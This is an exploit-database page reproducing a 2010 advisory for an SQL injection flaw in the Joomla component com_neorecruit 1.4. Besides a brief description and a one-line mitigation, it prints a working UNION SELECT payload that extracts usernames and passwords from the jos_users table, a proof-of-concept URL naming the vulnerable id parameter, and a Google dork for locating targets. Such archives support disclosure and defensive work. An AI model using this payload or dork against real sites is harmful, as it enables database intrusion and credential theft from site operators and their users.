header-logo
Suggest Exploit
vendor:
NeoRecruit
by:
v3n0m
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: NeoRecruit
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:neojoomla:neorecruit:1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability

A vulnerability exists in Joomla Component com_neorecruit 1.4 (id) which allows an attacker to inject arbitrary SQL commands. This can be exploited to disclose sensitive information from the database, modify data, or potentially compromise the system by executing malicious commands.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: August, 07-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: NeoRecruit
Version		: 1.4 Lower versions may also be affected
Vendor  	: http://www.neojoomla.com/
Price		: 54,90 €
Google Dork	: inurl:com_neorecruit
----------------------------------------------------------------

Xploit:
~~~~~~~

-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--

Poc:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]

----------------------------------------------------------------

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

---------------------------[EOF]--------------------------------

Navigation

Suggest Exploit

Services By CQR